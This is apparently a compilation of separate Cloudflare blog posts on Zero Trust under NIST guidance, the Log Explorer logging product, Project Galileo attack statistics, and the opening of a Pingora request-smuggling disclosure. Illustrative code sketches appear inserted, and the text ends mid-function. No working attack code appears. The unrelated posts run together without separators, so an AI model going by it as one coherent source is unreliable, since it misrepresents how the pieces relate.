ICAM: Cloudflare’s control plane integrates with many ICAM providers that provide Single Sign On (SSO) and Multi-Factor Authentication (MFA). The ICAM provider authenticates human Subjects and passes information about authenticated users and groups back to Cloudflare’s control plane using Security Assertion Markup Language (SAML) or OpenID Connect (OIDC) integrations. Cloudflare’s ICAM integration also supports AI/ML powered behavior-based user risk scoring, exchange, and re-evaluation. In the figure above, we depicted Okta as the ICAM provider, but Cloudflare supports many other ICAM vendors (e.g. Microsoft Entra, JumpCloud, GitHub SSO, PingOne). For non-human Subjects, such as service accounts, Internet of Things (IoT) devices, or machine identities, authentication can be performed through certificates, service tokens, or other cryptographic methods.

Endpoint security: Cloudflare’s control plane integrates with many endpoint security providers to exchange signals, such as device posture checks and user risk levels. Cloudflare facilitates this through integrations with endpoint detection and response (EDR) and endpoint protection platform (EPP) solutions, such as CrowdStrike, Microsoft, SentinelOne, and more. When posture checks are enabled with one of these vendors, such as Microsoft, device state changes (for example, to 'noncompliant') can be sent to Cloudflare Zero Trust, automatically restricting access to Resources. Additionally, Cloudflare Zero Trust can synchronize the Microsoft Entra ID risky users list and apply more stringent Zero Trust policies to users at higher risk.

Security Analytics: Cloudflare’s control plane integrates with real-time logging and analytics for persistent monitoring. Cloudflare's own analytics and logging features monitor access requests and security events. Optionally, these events can be sent to a Security Information and Event Management (SIEM) solution such as CrowdStrike, Datadog, IBM QRadar, Microsoft Sentinel, New Relic, Splunk, and more, using Cloudflare’s Logpush integration. Cloudflare's user risk scoring system is built on the OpenID Shared Signals Framework (SSF) Specification, which allows integration with existing and future providers that support this standard. SSF focuses on the exchange of Security Event Tokens (SETs), a specialized type of JSON Web Token (JWT). By using SETs, providers can share user risk information, creating a network of real-time, shared security intelligence. In the context of NIST’s Zero Trust Architecture, this system functions as a PIP, which is responsible for gathering information about the Subject and their context, such as risk scores, device posture, or threat intelligence. This information is then provided to the PDP, which evaluates access requests and determines the appropriate policy actions. The PEP uses these decisions to allow or deny access, completing the cycle of secure, dynamic access control.



Data security: Cloudflare’s Zero Trust offering provides robust data security capabilities across data-in-transit, data-in-use, and data-at-rest. Its Data Loss Prevention (DLP) safeguards sensitive information in transit by inspecting and blocking unauthorized data movement. Remote Browser Isolation (RBI) protects data-in-use by preventing malware, phishing, and unauthorized exfiltration while enabling secure web access. Meanwhile, Cloud Access Security Broker (CASB) ensures data-at-rest security by enforcing granular controls over SaaS applications, preventing unauthorized access and data leakage. Together, these capabilities provide comprehensive protection for modern enterprises operating in a cloud-first environment.
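To make the division of labor between PIP, PDP, and PEP concrete, here is a minimal Python sketch. It is an illustration of the NIST roles described above, not Cloudflare's implementation: the `SubjectContext` fields, the `Policy` shape, and the risk levels are all assumptions invented for this example.

```python
from dataclasses import dataclass

# Ordering of the (hypothetical) risk levels a PIP might report.
RISK_ORDER = {"low": 0, "medium": 1, "high": 2}


@dataclass(frozen=True)
class SubjectContext:
    """Signals a PDP might receive from PIPs (all fields are illustrative)."""
    authenticated: bool      # result from the ICAM provider (SSO/MFA)
    groups: frozenset        # group membership passed back via SAML or OIDC
    device_compliant: bool   # posture signal from an endpoint security vendor
    user_risk: str           # "low", "medium", or "high"


@dataclass(frozen=True)
class Policy:
    """A hypothetical per-application access policy."""
    required_group: str
    max_risk: str = "medium"


def decide(policy: Policy, ctx: SubjectContext) -> str:
    """PDP role: evaluate one access request and return "allow" or "deny"."""
    if not ctx.authenticated:
        return "deny"
    if policy.required_group not in ctx.groups:
        return "deny"
    if not ctx.device_compliant:
        return "deny"
    if RISK_ORDER[ctx.user_risk] > RISK_ORDER[policy.max_risk]:
        return "deny"
    return "allow"


def enforce(policy: Policy, ctx: SubjectContext) -> bool:
    """PEP role: forward the request only when the PDP says allow."""
    return decide(policy, ctx) == "allow"
```

In this sketch, a device that flips to noncompliant or a user whose risk level rises above the policy's limit is denied on the next request, which mirrors the dynamic re-evaluation described above.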

By leveraging Cloudflare's Zero Trust platform, enterprises can simplify and enhance their ZTA implementation, securing diverse environments and endpoints while ensuring scalability and ease of deployment. This approach ensures that all access requests—regardless of where the Subjects or Resources are located—adhere to robust security policies, reducing risks and improving compliance with modern security standards.

Cloudflare works with multiple enterprises, and federal and state agencies that rely on NIST guidelines to secure their networks.  So we take a brief detour to describe some unique features of Cloudflare’s Zero Trust platform that we’ve found to be valuable to these enterprises.

FedRAMP data centers. Many government agencies and commercial enterprises have FedRAMP requirements, and Cloudflare is well-equipped to support them. FedRAMP requirements sometimes lead organizations to self-host software and services inside their own network perimeter, which can result in higher latency, degraded performance, and increased cost. At Cloudflare, we take a different approach. Organizations can still benefit from Cloudflare’s global network and unparalleled performance while remaining FedRAMP compliant. To support FedRAMP customers, Cloudflare’s dataplane (aka our PEP, or Policy Enforcement Point) consists of data centers in over 330 cities where customers can send their encrypted traffic, and 32 FedRAMP data centers where traffic is sent when sensitive dataplane operations are required (e.g. TLS inspection). This architecture means that our customers do not need to self-host a PEP and incur the associated cost, latency, and performance degradation.

Post-quantum cryptography. NIST has announced that by 2030 all conventional cryptography (RSA and ECDSA) must be deprecated and upgraded to post-quantum cryptography. But upgrading cryptography is hard and takes time, so Cloudflare aims to take on the burden of managing cryptography upgrades for our customers. That’s why organizations can tunnel their corporate network traffic through Cloudflare’s Zero Trust platform, protecting it against quantum adversaries without the hassle of individually upgrading each and every corporate application, system, or network connection. End-to-end quantum safety is available for communications from end-user devices, via web browser (today) or Cloudflare’s WARP device client (mid-2025), to secure applications connected with Cloudflare Tunnel.

NIST’s latest publication, SP 1800-35, provides a structured approach to implementing Zero Trust, emphasizing the importance of policy enforcement, continuous authentication, and secure access management. Cloudflare’s Zero Trust platform simplifies this complex framework by delivering a scalable, globally distributed solution that is FedRAMP-compliant and integrates with industry-leading providers like Okta, Microsoft, Ping, CrowdStrike, and SentinelOne to ensure comprehensive protection.

A key differentiator of Cloudflare’s Zero Trust solution is our global anycast network, one of the world’s largest and most interconnected networks. Spanning 330+ cities across 120+ countries, this network provides unparalleled performance, resilience, and scalability for enforcing Zero Trust policies without negatively impacting the end user experience. By leveraging Cloudflare’s network-level enforcement of security controls, organizations can ensure that access control, data protection, and security analytics operate at the speed of the Internet, without backhauling traffic through centralized choke points. This architecture enables low-latency, highly available enforcement of security policies, allowing enterprises to seamlessly protect users, devices, and applications across on-prem, cloud, and hybrid environments.

Now is the time to take action. You can start implementing Zero Trust today by leveraging Cloudflare’s platform in alignment with NIST’s reference architecture. Whether you are beginning your Zero Trust journey or enhancing an existing framework, Cloudflare provides the tools, network, and integrations to help you succeed. Sign up for Cloudflare Zero Trust, explore our integrations, and secure your organization with a modern, globally distributed approach to cybersecurity.

Security teams and developers use Cloudflare to detect and mitigate threats in real-time and to optimize application performance. Over the years, users have asked for additional telemetry with full context to investigate security incidents or troubleshoot application performance issues without having to forward data to third-party log analytics and Security Information and Event Management (SIEM) tools. Besides avoidable costs, forwarding data externally comes with other drawbacks, such as complex setups, delayed access to crucial data, and a frustrating lack of context that complicates quick mitigation.

Log Explorer has been previewed by several hundred customers over the last year, and they attest to its benefits:

“Having WAF logs (firewall events) instantly available in Log Explorer with full context (no waiting, no external tools) has completely changed how we manage our firewall rules. I can spot an issue, adjust the rule with a single click, and immediately see the effect. It’s made tuning for false positives faster, cheaper, and far more effective.”

“While we use Logpush to ingest Cloudflare logs into our SIEM, when our development team needs to analyze logs, it can be more effective to utilize Log Explorer. SIEMs make it difficult for development teams to write their own queries and manipulate the console to see the logs they need. Cloudflare's Log Explorer, on the other hand, makes it much easier for dev teams to look at logs and directly search for the information they need.”

With Log Explorer, customers have access to Cloudflare logs with all the context available within the Cloudflare platform. Compared to external tools, customers benefit from:

Reduced cost and complexity: Drastically reduce the expense and operational overhead associated with forwarding, storing, and analyzing terabytes of log data in external tools.

Faster detection and triage: Access Cloudflare-native logs directly, eliminating cumbersome data pipelines and the ingest lags that delay critical security insights.

Accelerated investigations with full context: Investigate incidents with Cloudflare's unparalleled contextual data, accelerating your analysis and understanding of "What exactly happened?" and "How did it happen?"

Minimal recovery time: Seamlessly transition from investigation to action with direct mitigation capabilities via the Cloudflare platform.

Log Explorer is available as an add-on product for customers on our self-serve or Enterprise plans. Read on to learn how each of the capabilities of Log Explorer can help you detect and diagnose issues more quickly.





Custom dashboards allow you to define the specific metrics you need in order to monitor unusual or unexpected activity in your environment.

Getting started is easy, with the ability to create a chart using natural language. A natural language interface is integrated into the chart create/edit experience, enabling you to describe in your own words the chart you want to create. Similar to the AI Assistant we announced during Security Week 2024, the prompt translates your language to the appropriate chart configuration, which can then be added to a new or existing custom dashboard.



As an example, you can create a dashboard for monitoring the presence of Remote Code Execution (RCE) attacks in your environment. An RCE attack is where an attacker is able to compromise a machine in your environment and execute commands. The good news is that RCE is a detection available in Cloudflare WAF. In the dashboard example below, you can not only watch for RCE attacks, but also correlate them with other security events such as malicious content uploads, source IP addresses, and JA3/JA4 fingerprints. Such a scenario could mean one or more machines in your environment are compromised and being used to spread malware, which is surely a very high-risk incident!

A reliability engineer might want to create a dashboard for monitoring errors. They could use the natural language prompt to enter a query like “Compare HTTP status code ranges over time.” The AI model then decides the most appropriate visualization and constructs their chart configuration.

While you can create custom dashboards from scratch, you could also use an expert-curated dashboard template to jumpstart your security and performance monitoring.

Available templates include:



Bot monitoring: Identify automated traffic accessing your website

API Security: Monitor the data transfer and exceptions of API endpoints within your application

API Performance: See timing data for API endpoints in your application, along with error rates





Account Takeover: View login attempts, usage of leaked credentials, and identify account takeover attacks

Performance Monitoring: Identify slow hosts and paths on your origin server, and view time to first byte (TTFB) metrics over time

Security Monitoring: Monitor attack distribution across top hosts and paths, and correlate DDoS traffic with origin response time to understand the impact of DDoS attacks

Continuing with the example from the prior section, after successfully diagnosing that some machines were compromised through the RCE issue, analysts can pivot over to Log Search in order to investigate whether the attacker was able to access and compromise other internal systems. To do that, the analyst could search logs from Zero Trust services, using context, such as compromised IP addresses from the custom dashboard, shown in the screenshot below:















Log Search is a streamlined experience that includes data type-aware search filters and the ability to switch to a custom SQL interface for more powerful queries. Log searches are also available via a public API.



Queries built in Log Search can now be saved for repeated use and are accessible to other Log Explorer users in your account. This makes it easier than ever to investigate issues together.

With custom alerting, you can configure custom alert policies in order to proactively monitor the indicators that are important to your business.

Starting from Log Search, define and test your query. From here you can opt to save and configure a schedule interval and alerting policy. The query will run automatically on the schedule you define.



If you want to monitor the error rate for a particular host, you can use this Log Search query to calculate the error rate per time interval:

```sql
-- Bucket requests by hour: keep the first 14 characters of the timestamp
-- (through "HH:") and pad with "00:00".
SELECT SUBSTRING(EdgeStartTimestamp, 1, 14) || '00:00' AS time_interval,
       COUNT(*) AS total_requests,
       -- COUNT ignores NULLs, so only 5xx responses are counted here.
       COUNT(CASE WHEN EdgeResponseStatus >= 500 THEN 1 ELSE NULL END) AS error_requests,
       COUNT(CASE WHEN EdgeResponseStatus >= 500 THEN 1 ELSE NULL END) * 100.0 / COUNT(*) AS error_rate_percentage
FROM http_requests
WHERE EdgeStartTimestamp >= '2025-08-06T20:56:58Z'
  AND EdgeStartTimestamp <= '2025-08-06T21:26:58Z'
  AND ClientRequestHost = 'customhostname.com'
GROUP BY time_interval
ORDER BY time_interval ASC;
```

Running the above query returns the following results. You can see the overall error rate percentage in the far right column of the query results.


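To see how the hourly bucketing and the error-rate arithmetic in this query behave, the following Python sketch runs an equivalent query against a handful of made-up rows in an in-memory SQLite database. SQLite stands in for Log Explorer here purely for illustration; the sample rows and the `otherhost.example` hostname are invented, and `substr` is used in place of `SUBSTRING` because it is available in every SQLite version.

```python
import sqlite3

# Invented sample data: (EdgeStartTimestamp, ClientRequestHost, EdgeResponseStatus)
ROWS = [
    ("2025-08-06T20:57:10Z", "customhostname.com", 200),
    ("2025-08-06T20:58:30Z", "customhostname.com", 502),
    ("2025-08-06T21:05:00Z", "customhostname.com", 200),
    ("2025-08-06T21:10:00Z", "customhostname.com", 200),
    ("2025-08-06T21:15:00Z", "customhostname.com", 500),
    ("2025-08-06T21:20:00Z", "customhostname.com", 404),  # 4xx is not counted as an error
    ("2025-08-06T21:00:00Z", "otherhost.example", 503),   # filtered out by host
]

QUERY = """
SELECT substr(EdgeStartTimestamp, 1, 14) || '00:00' AS time_interval,
       COUNT(*) AS total_requests,
       COUNT(CASE WHEN EdgeResponseStatus >= 500 THEN 1 ELSE NULL END) AS error_requests,
       COUNT(CASE WHEN EdgeResponseStatus >= 500 THEN 1 ELSE NULL END) * 100.0 / COUNT(*)
           AS error_rate_percentage
FROM http_requests
WHERE EdgeStartTimestamp >= '2025-08-06T20:56:58Z'
  AND EdgeStartTimestamp <= '2025-08-06T21:26:58Z'
  AND ClientRequestHost = 'customhostname.com'
GROUP BY time_interval
ORDER BY time_interval ASC;
"""


def error_rates(rows):
    """Load rows into an in-memory table and return the per-hour error rates."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE http_requests ("
        "EdgeStartTimestamp TEXT, ClientRequestHost TEXT, EdgeResponseStatus INTEGER)"
    )
    conn.executemany("INSERT INTO http_requests VALUES (?, ?, ?)", rows)
    result = conn.execute(QUERY).fetchall()
    conn.close()
    return result


if __name__ == "__main__":
    for row in error_rates(ROWS):
        print(row)
```

Because the timestamps are ISO 8601 strings in a single format, plain string comparison in the `WHERE` clause orders them chronologically, and truncating to 14 characters groups them by hour.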

We can identify malware in the environment by monitoring logs from Cloudflare Secure Web Gateway. As an example, Katz Stealer is malware-as-a-service designed for stealing credentials. We can monitor DNS queries and HTTP requests from users within the company in order to identify any machines that may be infected with Katz Stealer malware.

And with custom alerts, you can configure an alert policy so that you can be notified via webhook or PagerDuty.
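Conceptually, an alert policy pairs a scheduled query with a condition on its results. The sketch below shows one way such a check could look in Python. It is a hypothetical illustration only: the `evaluate_alert` function, the payload fields, and the policy name are assumptions for this example and do not describe Cloudflare's alerting API or notification format.

```python
def evaluate_alert(rows, threshold_pct):
    """Return a notification payload if any interval breaches the threshold.

    rows: tuples of (time_interval, total_requests, error_requests,
          error_rate_percentage), as a per-interval error-rate query might return.
    Returns None when no interval exceeds threshold_pct.
    """
    breaches = [
        {"time_interval": row[0], "error_rate_percentage": row[3]}
        for row in rows
        if row[3] > threshold_pct
    ]
    if not breaches:
        return None
    return {
        "alert": "error-rate-threshold",  # hypothetical policy name
        "threshold_percentage": threshold_pct,
        "breaches": breaches,
    }


if __name__ == "__main__":
    sample = [
        ("2025-08-06T20:00:00", 2, 1, 50.0),
        ("2025-08-06T21:00:00", 4, 1, 25.0),
    ]
    print(evaluate_alert(sample, threshold_pct=30.0))
```

A scheduler would run the saved query at the configured interval, pass the rows to a check like this, and hand any non-empty payload to the configured destination.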

With flexible retention, you can set the precise length of time you want to store your logs, allowing you to meet specific compliance and audit requirements with ease. Other providers require archiving or hot and cold storage, making it difficult to query older logs. Log Explorer is built on top of our R2 storage tier, so historical logs can be queried as easily as current logs.



With Log Explorer, we have built a scalable log storage platform on top of Cloudflare R2 that lets you efficiently search your Cloudflare logs using familiar SQL queries. In this section, we’ll look into how we did this and how we solved some technical challenges along the way. Log Explorer consists of three components: ingestors, compactors, and queriers. Ingestors are responsible for writing logs from Cloudflare’s data pipeline to R2. Compactors optimize storage files, so they can be queried more efficiently. Queriers execute SQL queries from users by fetching, transforming, and aggregating matching logs from R2.

During ingestion, Log Explorer writes each batch of log records to a Parquet file in R2. Apache Parquet is an open-source columnar storage file format, and it was an obvious choice for us: it’s optimized for efficient data storage and retrieval. For example, it embeds metadata such as the minimum and maximum values of each column across the file, which enables the queriers to quickly locate the data needed to serve a query.

Log Explorer stores logs on a per-customer level, just like Cloudflare D1, so that your data isn't mixed with that of other customers. In Q3 2025, per-customer logs will allow you the flexibility to create your own retention policies and decide in which regions you want to store your data. But how does Log Explorer find those Parquet files when you query your logs? Log Explorer leverages the Delta Lake open table format to provide a database table abstraction atop R2 object storage. A table in Delta Lake pairs data files in Parquet format with a transaction log. The transaction log registers every addition, removal, or modification of a data file for the table; it’s stored right next to the data files in R2.

Given a SQL query for a particular log dataset such as HTTP Requests or Gateway DNS, Log Explorer first has to load the transaction log of the corresponding Delta table from R2. Transaction logs are checkpointed periodically to avoid having to read the entire table history every time a user queries their logs.
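The effect of checkpointing can be illustrated with a small Python sketch. It models a transaction log as a list of versioned commits containing add and remove actions, which is a simplification of the Delta Lake log format; the tuple layout, the `live_files` function, and the file names are assumptions made for this example.

```python
def live_files(commits, checkpoint=None):
    """Replay add/remove actions to find the data files that make up the table.

    commits:    list of (version, actions); each action is ("add" | "remove", path).
    checkpoint: optional (version, paths) snapshot of the table at that version.
    Returns (set of live paths, number of commits that had to be replayed).
    """
    if checkpoint is None:
        start_version, files = -1, set()
    else:
        start_version, files = checkpoint[0], set(checkpoint[1])

    replayed = 0
    for version, actions in sorted(commits, key=lambda commit: commit[0]):
        if version <= start_version:
            continue  # already reflected in the checkpoint
        replayed += 1
        for op, path in actions:
            if op == "add":
                files.add(path)
            elif op == "remove":
                files.discard(path)
    return files, replayed


if __name__ == "__main__":
    commits = [
        (0, [("add", "a.parquet")]),
        (1, [("add", "b.parquet")]),
        (2, [("remove", "a.parquet"), ("add", "c.parquet")]),
        (3, [("add", "d.parquet")]),
    ]
    print(live_files(commits))
    print(live_files(commits, checkpoint=(2, {"b.parquet", "c.parquet"})))
```

Both calls arrive at the same set of live files, but the second only replays the commits written after the checkpoint, which is why periodic checkpoints keep query startup cost from growing with table history.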

Besides listing Parquet files for a table, the transaction log also includes per-column min/max statistics for each Parquet file. This has the benefit that Log Explorer only needs to fetch files from R2 that can possibly satisfy a user query. Finally, queriers use the min/max statistics embedded in each Parquet file to decide which row groups to fetch from the file.
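File pruning with min/max statistics boils down to an interval-overlap test. Here is a minimal Python sketch of that idea, assuming each file's statistics are reduced to a single timestamp range; the `FileStats` type, the `prune` function, and the file names are hypothetical and chosen only for illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class FileStats:
    """Per-file min/max statistics for a timestamp column (illustrative)."""
    path: str
    min_ts: str
    max_ts: str


def prune(files, query_start, query_end):
    """Keep only files whose [min_ts, max_ts] range overlaps the query window.

    Timestamps are ISO 8601 strings in one consistent format, so plain string
    comparison orders them chronologically.
    """
    return [
        f.path
        for f in files
        if f.max_ts >= query_start and f.min_ts <= query_end
    ]


if __name__ == "__main__":
    files = [
        FileStats("a.parquet", "2025-08-06T20:00:00Z", "2025-08-06T20:29:59Z"),
        FileStats("b.parquet", "2025-08-06T20:30:00Z", "2025-08-06T20:59:59Z"),
        FileStats("c.parquet", "2025-08-06T21:00:00Z", "2025-08-06T21:29:59Z"),
    ]
    print(prune(files, "2025-08-06T20:56:58Z", "2025-08-06T21:26:58Z"))
```

The same overlap test can be applied a second time inside each fetched file, against the statistics of individual row groups, to skip row groups that cannot contain matching records.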

Log Explorer processes SQL queries using Apache DataFusion, a fast, extensible query engine written in Rust, and delta-rs, a community-driven Rust implementation of the Delta Lake protocol. While standing on the shoulders of giants, our team had to solve some unique problems to provide log search at Cloudflare scale.

Log Explorer ingests logs from across Cloudflare’s vast global network, spanning more than 330 cities in over 125 countries. If Log Explorer were to write logs from our servers straight to R2, its storage would quickly fragment into a myriad of small files, rendering log queries prohibitively expensive.

Log Explorer’s strategy to avoid this fragmentation is threefold. First, it leverages Cloudflare’s data pipeline, which collects and batches logs from the edge, ultimately buffering each stream of logs in an internal system named Buftee. Second, log batches ingested from Buftee aren’t immediately committed to the transaction log; rather, Log Explorer stages commits for multiple batches in an intermediate area and “squashes” these commits before they’re written to the transaction log. Third, once log batches have been committed, a process called compaction merges them into larger files in the background.

While the open-source implementation of Delta Lake provides compaction out of the box, we soon encountered an issue when using it for our workloads. Stock compaction merges data files to a desired target size S by sorting the files in reverse order of their size and greedily filling bins of size S with them. By merging logs irrespective of their timestamps, this process distributed ingested batches randomly across merged files, destroying data locality. Despite compaction, a user querying for a specific time frame would still end up fetching hundreds or thousands of files from R2.

For this reason, we wrote a custom compaction algorithm that merges ingested batches in order of their minimum log timestamp, leveraging the min/max statistics mentioned previously. This algorithm reduced the number of overlaps between merged files by two orders of magnitude. As a result, we saw a significant improvement in query performance, with some large queries that had previously taken over a minute completing in just a few seconds.
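The difference between the two strategies can be seen on a toy input. The Python sketch below is a simplified model, not the delta-rs or Log Explorer code: it uses a basic next-fit packing loop for both strategies and only changes the sort order, and the `Batch` type, function names, and sample sizes are assumptions made for illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Batch:
    """One ingested log batch with its size and timestamp range (illustrative)."""
    size: int
    min_ts: int
    max_ts: int


def pack(batches, target_size):
    """Greedily fill bins up to target_size, taking batches in the given order."""
    bins, current, current_size = [], [], 0
    for batch in batches:
        if current and current_size + batch.size > target_size:
            bins.append(current)
            current, current_size = [], 0
        current.append(batch)
        current_size += batch.size
    if current:
        bins.append(current)
    return bins


def compact_by_size(batches, target_size):
    """Size-first packing: largest batches first, timestamps ignored."""
    ordered = sorted(batches, key=lambda b: b.size, reverse=True)
    return pack(ordered, target_size)


def compact_by_time(batches, target_size):
    """Timestamp-ordered packing: merge batches in order of minimum timestamp."""
    ordered = sorted(batches, key=lambda b: b.min_ts)
    return pack(ordered, target_size)


def overlapping_pairs(bins):
    """Count pairs of merged files whose timestamp ranges overlap."""
    spans = [
        (min(b.min_ts for b in merged), max(b.max_ts for b in merged))
        for merged in bins
    ]
    return sum(
        1
        for i in range(len(spans))
        for j in range(i + 1, len(spans))
        if spans[i][0] <= spans[j][1] and spans[j][0] <= spans[i][1]
    )


if __name__ == "__main__":
    sizes = [5, 1, 4, 2, 5, 1, 4, 2]
    # Eight consecutive one-minute batches with varying sizes.
    batches = [Batch(s, i * 60, i * 60 + 59) for i, s in enumerate(sizes)]
    print("size-first overlaps:", overlapping_pairs(compact_by_size(batches, 8)))
    print("time-ordered overlaps:", overlapping_pairs(compact_by_time(batches, 8)))
```

On this input, the time-ordered strategy produces merged files with disjoint time ranges, while size-first packing mixes distant batches into the same file. Fewer overlapping ranges means a time-bounded query can skip more files using the min/max statistics.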

We're just getting started! We're actively working on even more powerful features to further enhance your experience with Log Explorer. Subscribe to the blog and keep an eye on our Change Log for more updates to our observability and forensics offering soon.

To get access to Log Explorer, reach out for a consultation or contact your account manager. Additionally, you can read more in our Developer Documentation.

A lot has changed since we marked the 10th anniversary of Project Galileo. Yet, our commitment remains the same: help ensure that organizations doing critical work in human rights have access to the tools they need to stay online. We believe that organizations, no matter where they are in the world, deserve reliable, accessible protection to continue their important work without disruption.

For our 11th anniversary, we're excited to share several updates including:

An interactive Cloudflare Radar report providing insights into the cyber threats faced by at-risk public interest organizations protected under the project.

An expanded commitment to digital rights in the Asia-Pacific region with two new Project Galileo partners.

New stories from organizations protected by Project Galileo working on the frontlines of civil society, human rights, and journalism from around the world.

To mark Project Galileo’s 11th anniversary, we’ve published a new Radar report that shares data on cyberattacks targeting organizations protected by the program. It provides insights into the types of threats these groups face, with the goal of better supporting researchers, civil society, and vulnerable groups by promoting the best cybersecurity practices. Key insights include:

Our data indicates a growing trend in DDoS attacks against these organizations, becoming more common than attempts to exploit traditional web application vulnerabilities.

Between May 1, 2024, and March 31, 2025, Cloudflare blocked 108.9 billion cyber threats against organizations protected under Project Galileo. This is an average of nearly 325.2 million cyberattacks per day over the 11-month period, and a 241% increase from our 2024 Radar report.

Journalists and news organizations experienced the highest volume of attacks, with over 97 billion requests blocked as potential threats across 315 different organizations. The peak attack traffic was recorded on September 28, 2024. Ranked second was the Human Rights/Civil Society Organizations category, which saw 8.9 billion requests blocked, with peak attack activity occurring on October 8, 2024.

Cloudflare onboarded the Belarusian Investigative Center, an independent journalism organization, on September 27, 2024, while it was already under attack. A major application-layer DDoS attack followed on September 28, generating over 28 billion requests in a single day.

Many of the targets were investigative journalism outlets operating in regions under government pressure (such as Russia and Belarus), as well as NGOs focused on combating racism and extremism, and defending workers’ rights.

Tech4Peace, a human rights organization focused on digital rights, was targeted by a 12-day attack beginning March 10, 2025, that delivered over 2.7 billion requests. The attack combined prolonged, lower-intensity phases with short, high-intensity bursts. This deliberate variation in tactics reveals a coordinated approach, showing how attackers adapted their methods throughout the attack.

The full Radar report includes additional information on public interest organizations, human and civil rights groups, environmental organizations, and those involved in disaster and humanitarian relief. The dashboard also serves as a valuable resource for policymakers, researchers, and advocates working to protect public interest organizations worldwide.

Partnerships are core to Project Galileo’s success. We rely on 56 trusted civil society organizations around the world to help us identify and support groups who could benefit from our protection. With our partners' help, we’re expanding our reach to provide tools to communities that need protection the most. Today, we’re proud to welcome two new partners to Project Galileo who are championing digital rights, open technologies, and civil society in Asia and around the world.

EngageMedia is a nonprofit organization that brings together advocacy, media, and technology to promote digital rights, open and secure technology, and social issue documentaries. Based in the Asia-Pacific region, EngageMedia collaborates with changemakers and grassroots communities to protect human rights, democracy, and the environment.

As part of our partnership, Cloudflare participated in a 2025 Tech Camp for Human Rights Defenders hosted by EngageMedia, which brought together around 40 activist-technologists from across Asia-Pacific. Among other things, the camp focused on building practical skills in digital safety and website resilience against online threats. Cloudflare presented on common attack vectors targeting nonprofits and human rights groups, such as DDoS attacks, phishing, and website defacement, and shared how Project Galileo helps organizations mitigate these risks. We also discussed how to better promote digital security tools to vulnerable groups. The camp was a valuable opportunity for us to listen and learn from organizations on the front lines, offering insights that continue to shape our approach to building effective, community-driven security solutions.

Founded in 2014 by leaders of Taiwan’s open tech communities, the Open Culture Foundation (OCF) supports efforts to protect digital rights, promote civic tech, and foster open collaboration between government, civil society, and the tech community. Through our partnership, we aim to support more than 34 local civil society organizations in Taiwan by providing training and workshops to help them manage their website infrastructure, address vulnerabilities such as DDoS attacks, and conduct ongoing research to tackle the security challenges these communities face.

We continue to be inspired by the amazing work and dedication of the organizations that participate in Project Galileo. Helping protect these organizations and allowing them to focus on their work is a fundamental part of helping build a better Internet. Here are some of their stories:

Fair Future Foundation (Indonesia): non-profit that provides health, education, and access to essential resources like clean water and electricity in ultra-rural Southeast Asia.

Youth Initiative for Human Rights (Serbia): regional NGO network promoting human rights, youth activism, and reconciliation in the Balkans.

Belarusian Investigative Center (Belarus): media organization that conducts in-depth investigations into corruption, sanctions evasion, and disinformation in Belarus and neighboring regions.

The Greenpeace Canada Education Fund (GCEF) (Canada): non-profit that conducts research, investigations, and public education on climate change, biodiversity, and environmental justice.

Insight Crime (LATAM): nonprofit think tank and media organization that investigates and analyzes organized crime and citizen security in Latin America and the Caribbean.

Diez.md (Moldova): youth-focused Moldovan news platform offering content in Romanian and Russian on topics like education, culture, social issues, election monitoring and news.

EngageMedia (APAC): nonprofit dedicated to defending digital rights and supporting advocates for human rights, democracy, and environmental sustainability across the Asia-Pacific.

Pussy Riot (Europe): a global feminist art and activist collective using art, performance, and direct action to challenge authoritarianism and human rights violations.

Immigrant Legal Resource Center (United States): nonprofit that works to advance immigrant rights by offering legal training, developing educational materials, advocating for fair policies, and supporting community-based organizations.

5W Foundation (Netherlands): wildlife conservation non-profit that supports front-line conservation teams globally by providing equipment to protect threatened species and ecosystems.

These case studies offer a window into the diverse, global nature of the threats these groups face and the vital role cybersecurity plays in enabling them to stay secure online. Check out their stories and more: cloudflare.com/project-galileo-case-studies/

In 2025, many of our Project Galileo partners have faced significant funding cuts, affecting their operations and their ability to support communities, defend human rights, and champion democratic values. Ensuring continued support for those services, despite financial and logistical challenges, is more important than ever. We’re thankful to our civil society partners who continue to assist us in identifying groups that need our support. Together, we're working toward a more secure, resilient, and open Internet for all. To learn more about Project Galileo and how it supports at-risk organizations worldwide, visit cloudflare.com/galileo.

Customers using the free tier of Cloudflare’s CDN or users of the caching functionality provided in the open source pingora-proxy and pingora-cache crates could have been exposed. Cloudflare’s investigation revealed no evidence that the vulnerability was being exploited, and we were able to mitigate the vulnerability by April 12, 2025 06:44 UTC, within 22 hours of being notified.

The bug bounty report detailed that an attacker could potentially exploit an HTTP/1.1 request smuggling vulnerability on Cloudflare’s CDN service. The reporter noted that via this exploit, they were able to cause visitors to Cloudflare sites to make subsequent requests to their own server and observe which URLs the visitor was originally attempting to access.

We treat any potential request smuggling or caching issue with extreme urgency.  After our security team escalated the vulnerability, we began investigating immediately, took steps to disable traffic to vulnerable components, and deployed a patch.

We are sharing the details of the vulnerability, how we resolved it, and what we can learn from it. No action is needed from Cloudflare customers, but if you are using the Pingora OSS framework, we strongly urge you to upgrade to Pingora 0.5.0 or later.

Request smuggling is a type of attack where an attacker can exploit inconsistencies in the way different systems parse HTTP requests. For example, when a client sends an HTTP request to an application server, it typically passes through multiple components such as load balancers, reverse proxies, etc., each of which has to parse the HTTP request independently. If two of the components the request passes through interpret the HTTP request differently, an attacker can craft a request that one component sees as complete, but the other continues to parse into a second, malicious request made on the same connection.

In the case of Pingora, the reported request smuggling vulnerability was made possible by an HTTP/1.1 parsing bug when caching was enabled.

The pingora-cache crate adds an HTTP caching layer to a Pingora proxy, allowing content to be cached on a configured storage backend to help improve response times, and reduce bandwidth and load on backend servers.

HTTP/1.1 supports “persistent connections” (RFC 9112, Section 9.3), such that one TCP connection can be reused for multiple HTTP requests, instead of needing to establish a connection for each request. However, only one request can be processed on a connection at a time (with rare exceptions such as HTTP/1.1 pipelining). The RFC notes that each request must have a “self-defined message length” for its body, as indicated by headers such as Content-Length or Transfer-Encoding, to determine where one request ends and another begins.
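To make the framing rule concrete, here is a minimal sketch of how a parser might split several requests arriving on one connection using Content-Length alone. The function name `split_requests` is hypothetical, and Transfer-Encoding is deliberately left out; this illustrates the idea and is not how Pingora implements it.

```python
def split_requests(stream: bytes) -> list[tuple[bytes, bytes]]:
    """Split a byte stream of HTTP/1.1 requests into (head, body) pairs.

    Assumption: only Content-Length framing is handled; a request
    without that header is treated as having an empty body.
    """
    requests = []
    pos = 0
    while pos < len(stream):
        # The request head ends at the first blank line.
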